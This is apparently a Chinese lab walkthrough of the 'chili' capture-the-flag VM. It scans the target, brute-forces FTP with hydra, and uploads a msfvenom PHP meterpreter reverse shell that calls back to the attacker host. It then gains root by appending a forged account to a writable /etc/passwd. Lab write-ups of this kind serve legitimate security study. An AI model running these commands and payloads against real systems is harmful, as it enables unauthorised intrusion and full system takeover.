chili

靶机准备

首先将靶机ova文件导入
chili
网络模式改为NAT
扫描ip

netdiscover -r 192.168.164.0/24

chili
kali:192.168.164.137

渗透测试

扫描端口

nmap -sS -sV -T5 -A -p- 192.168.164.186

开启了2个端口:21、80
chili
扫描目录:

dirb http://192.168.164.186

chili
直接访问网站,只有一个小辣椒
chili
查看源码,有一些关键信息
chili
爬取关键词生成字典,爆破FTP服务

cewl http://192.168.164.186 > test.txt

chili
chili
爆破FTP

hydra -L /root/test.txt -P /usr/share/wordlists/fasttrack.txt -f -V ftp://192.168.164.186

chili
获得用户:chili 密码:a1b2c3d4

利用

登入FTP
chili
查看网站目录/var/www/html,看看文件和权限
chili
发现.nano有最高权限,msf生成马上传到.nano里
生成马:

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.164.137 LPORT=1234 raw  > shell.php

chili
ftp上传到.nano设置777权限

put /root/shell.php /var/www/html/.nano/shell1.php

将shell.php赋予执行权限

chmod 777 /var/www/html/.nano/shell1.php

chili
MSF开启监控,连接php马

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.164.137
set lport 1234
run

chili

提权

切换交互式shell

python3 -c "import pty;pty.spawn('/bin/bash')"

chili
查看时普通权限
chili
在/etc目录下看见passwd具有写操作,尝试/etc/passwd提权
chili
使用命令:perl -le 'print crypt("test","test")' ,这个命令为使用perl脚本语言,执行crypt模块,将test加密字符串输出;
chili
使用命令:echo "test:teH0wLIpW0gyQ:0:0:ROOT:/root:/bin/bash" >> /etc/passwd
在passwd文件中,写入test账户信息
成功提权
chili
提权后进入root目录下获取flag
chili

上一篇:SVN的安装和使用


下一篇:文本操作find cut sort wc sed awk